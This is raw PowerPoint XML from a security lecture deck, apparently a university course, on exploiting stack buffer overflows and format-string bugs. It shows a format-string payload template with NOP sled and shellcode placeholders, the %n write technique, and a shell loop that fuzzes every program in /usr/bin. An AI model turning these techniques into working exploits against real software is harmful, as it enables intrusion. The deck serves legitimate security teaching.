                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng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5.  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765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Hijack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 return address with buffer-overflow induced by format string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Writing any value to any address directly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%n format specifier for writing (see paper)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writing (some value) to a specific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controlling the written value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19493697">
            <a:off x="3549731" y="4757193"/>
            <a:ext cx="7075287" cy="10624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Not common in practice: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GOT overwrite more popular</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26052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Font typeface="+mj-lt"/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inp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> –e '{print "A"x8000}'`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="+mj-lt"/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 for program in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/bin/*;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 smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   for opt in {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>a..z</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>} {A..Z</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>};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 timeout –s 9 1s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       $program -$opt $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>inp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRP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 smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   done</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="6"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> done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8229600" cy="1447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457200" bIns="457200" rtlCol="0" anchor="ctr" anchorCtr="1"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Cambria"/>
              </a:rPr>
              <a:t>1009 Linux programs. 13 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>minutes. 52 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Cambria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ambria"/>
              </a:rPr>
              <a:t>bugs in 29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5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70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Overflow by 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085" y="1589012"/>
            <a:ext cx="4434115" cy="925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[32];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sprintf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, user);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44584" y="3797301"/>
            <a:ext cx="6199415" cy="681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“%36u\x3c\xd3\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>\bf&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>nops</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;”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904670" y="4698746"/>
            <a:ext cx="2810330" cy="1070267"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -26752"/>
              <a:gd name="adj2" fmla="val -10020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dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>6 digit decimal, overwriting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>buf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caller’s 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52685" y="2957286"/>
            <a:ext cx="2231571" cy="632556"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -22033"/>
              <a:gd name="adj2" fmla="val 9321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Overwrite</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br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382657" y="4730774"/>
            <a:ext cx="1846943" cy="632556"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -35393"/>
              <a:gd name="adj2" fmla="val -13224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Shellcode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err="1" smtClean="0"/>
              <a:t>nop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7935" y="5056629"/>
            <a:ext cx="492443" cy="8489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err="1" smtClean="0"/>
              <a:t>sprintf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Left Brace 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537865" y="4862994"/>
            <a:ext cx="286577" cy="133881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33400" y="1385406"/>
            <a:ext cx="286577" cy="3429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935" y="2878787"/>
            <a:ext cx="492443" cy="44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22965"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="824442" y="1371600"/>
          <a:ext cx="146155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(32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6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Arc 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="4105933"/>
            <a:ext cx="609600" cy="542267"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16083689"/>
              <a:gd name="adj2" fmla="val 54728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thinkofme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300" y="1524000"/>
            <a:ext cx="4343400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48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14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2057400" y="2590800"/>
            <a:ext cx="4800600" cy="1524000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8288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12166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863725"/>
            <a:ext cx="6400800" cy="72707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000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Which bugs are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>exploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a: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6" name="Picture 20" descr="bsd-b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2" y="1600200"/>
            <a:ext cx="251498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51054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mbria"/>
              </a:rPr>
              <a:t>Evil David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2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and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i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>bug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> is a place where real execution behavior may </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>deviate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> from expected behavior.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> that gives an attacker an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27909"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="596900" y="3566795"/>
          <a:ext cx="7924800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4290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Objective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Control Flow Hijack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Gain control of the instruction pointer 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%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Denial of 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Cause program</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> to crash or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stop servicing clients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Disclosure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Leak private </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>information,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e.g., saved password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6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 “Smashing the Stack for Fun and Profit” by Alpha One (in repo)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Read “Exploiting Format Strings” by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>Scut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> (in repo)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Assume read: Chapter 3 of CS:APP book</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="3429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a basic ret2text (CS:APP course does this).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class exercise to reverse engineer and exploit simple buffer overflow + format string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Graduated sequence of CTF problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Basic buffer overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Advanced with canary</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DEP enabled (return-to-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>libc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ASLR exploit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10188</TotalTime>
  <Words>2917</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>851</Paragraphs>
  <Slides>53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template</vt:lpstr>
      <vt:lpstr>1_template</vt:lpstr>
      <vt:lpstr>Exploiting  Buffer Overflows and  Format String Vulnerabilities</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Which bugs are exploitable?</vt:lpstr>
      <vt:lpstr>Bugs and Exploits</vt:lpstr>
      <vt:lpstr>CMU’s Approach</vt:lpstr>
      <vt:lpstr>Teaching Methodology</vt:lpstr>
      <vt:lpstr>Goals and Skills</vt:lpstr>
      <vt:lpstr>Control Flow Recap</vt:lpstr>
      <vt:lpstr>Basic Execution</vt:lpstr>
      <vt:lpstr>Control Flow Hijack:  Always Computation + Control</vt:lpstr>
      <vt:lpstr>cdecl – the default for Linux &amp; gcc</vt:lpstr>
      <vt:lpstr>Buffer Overflows</vt:lpstr>
      <vt:lpstr>What are Buffer Overflows?</vt:lpstr>
      <vt:lpstr>Basic Example</vt:lpstr>
      <vt:lpstr>“123456”</vt:lpstr>
      <vt:lpstr>“A”x68 . “\xEF\xBE\xAD\xDE”</vt:lpstr>
      <vt:lpstr>Frame teardown—1</vt:lpstr>
      <vt:lpstr>Frame teardown—2</vt:lpstr>
      <vt:lpstr>Frame teardown—3</vt:lpstr>
      <vt:lpstr>ret2buf shellcode</vt:lpstr>
      <vt:lpstr>Executing system calls</vt:lpstr>
      <vt:lpstr>Shellcode example</vt:lpstr>
      <vt:lpstr>Program Example</vt:lpstr>
      <vt:lpstr>Execution</vt:lpstr>
      <vt:lpstr>Tips</vt:lpstr>
      <vt:lpstr>nop slides</vt:lpstr>
      <vt:lpstr>Protip 1: Use existing shellcode</vt:lpstr>
      <vt:lpstr>Protip 2: Reuse code  (ret2text or ret2libc)</vt:lpstr>
      <vt:lpstr>Recap</vt:lpstr>
      <vt:lpstr>Format String Attacks</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Channeling Vulnerabilities</vt:lpstr>
      <vt:lpstr>Don’t abuse printf</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Format String Functions</vt:lpstr>
      <vt:lpstr>Assembly View</vt:lpstr>
      <vt:lpstr>Simple Example</vt:lpstr>
      <vt:lpstr>Stack Diagram</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Stack Diagram @ printf</vt:lpstr>
      <vt:lpstr>Viewing Stack</vt:lpstr>
      <vt:lpstr>Viewing Specific Address—1</vt:lpstr>
      <vt:lpstr>Viewing Specific Address—2</vt:lpstr>
      <vt:lpstr>Control Flow Hijack</vt:lpstr>
      <vt:lpstr>Overflow by Format String</vt:lpstr>
      <vt:lpstr>In-class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Thanassis Avgerinos</cp:lastModifiedBy>
  <cp:revision>4587</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-11-02T18:57:24Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-11-07T13:40:04Z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